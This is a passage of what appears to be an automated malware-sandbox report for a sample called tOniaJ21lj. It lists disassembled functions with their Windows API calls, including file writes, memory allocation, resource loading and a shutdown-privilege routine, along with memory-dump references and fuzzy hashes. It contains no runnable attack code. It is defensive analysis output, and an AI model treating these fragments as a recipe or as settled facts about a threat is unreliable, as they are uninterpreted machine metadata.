                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                      Function 004074D8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                      • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                      Function 0040693C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                                      • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                                      • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                                      • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                                      Function 00407628 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID:
                                                                                      • API String ID: 442123175-0
                                                                                      • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                                      • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                                      • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                                      • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                                      Function 004071E4 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage
                                                                                      • String ID:
                                                                                      • API String ID: 1306739567-0
                                                                                      • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                                      • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                                      • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                                      • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                                      Function 0040760C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNEL32(?,02098000,00409F6B,00000000), ref: 00407613
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 734332943-0
                                                                                      • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                                      • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                                      • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                                      • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                                      Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                                      • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                                      • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                                      • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                                      Function 00406F77 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                                      • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                                      • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                                      • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                                      Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrev
                                                                                      • String ID:
                                                                                      • API String ID: 122130370-0
                                                                                      • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                      • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 00407DFC Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                                      • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                                      • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                                      • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                                      Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                      Function 004074A8 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                                      • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                                      • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                                      • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                                      Function 00407DA4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                                      • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                                      • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                                      • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614

                                                                                      Non-executed Functions

                                                                                      Function 0040936C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                      • String ID: SeShutdownPrivilege
                                                                                      • API String ID: 107509674-3733053543
                                                                                      • Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                                      • Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
                                                                                      • Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                                      • Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
                                                                                      Function 00409AD0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                                      • Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
                                                                                      • Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                                      • Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
                                                                                      Function 004026C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: SystemTime
                                                                                      • String ID: s-CP
                                                                                      • API String ID: 2656138-3630450927
                                                                                      • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                      • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                      • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                      • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                      Function 004051A8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                                      • Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
                                                                                      • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                                      • Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
                                                                                      Function 00405C44 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Version
                                                                                      • String ID:
                                                                                      • API String ID: 1889659487-0
                                                                                      • Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                                      • Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
                                                                                      • Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                                      • Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
                                                                                      Function 00408330 Relevance: .5, Instructions: 545COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                      • Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
                                                                                      • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                      • Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
                                                                                      Function 00406F84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                      • API String ID: 4190037839-2401316094
